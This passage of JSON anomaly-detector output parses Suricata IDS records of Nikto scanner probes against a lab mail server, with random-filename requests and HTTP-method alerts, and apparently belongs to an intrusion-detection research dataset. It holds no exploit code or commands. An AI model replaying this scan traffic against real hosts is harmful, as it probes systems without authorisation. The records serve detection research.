"{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30569, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46906, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1947518544553551, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80", "/parser/model/time": 1583349514.30769, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46908, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.00RelNotes", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.307877, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2147479336955668,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46908, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2147479336955668,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2147479336955668, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80", "/parser/model/time": 1583349514.310209, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant 
character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46910, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.310454, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":281440600897230,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46910, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":281440600897230,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 281440600897230, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
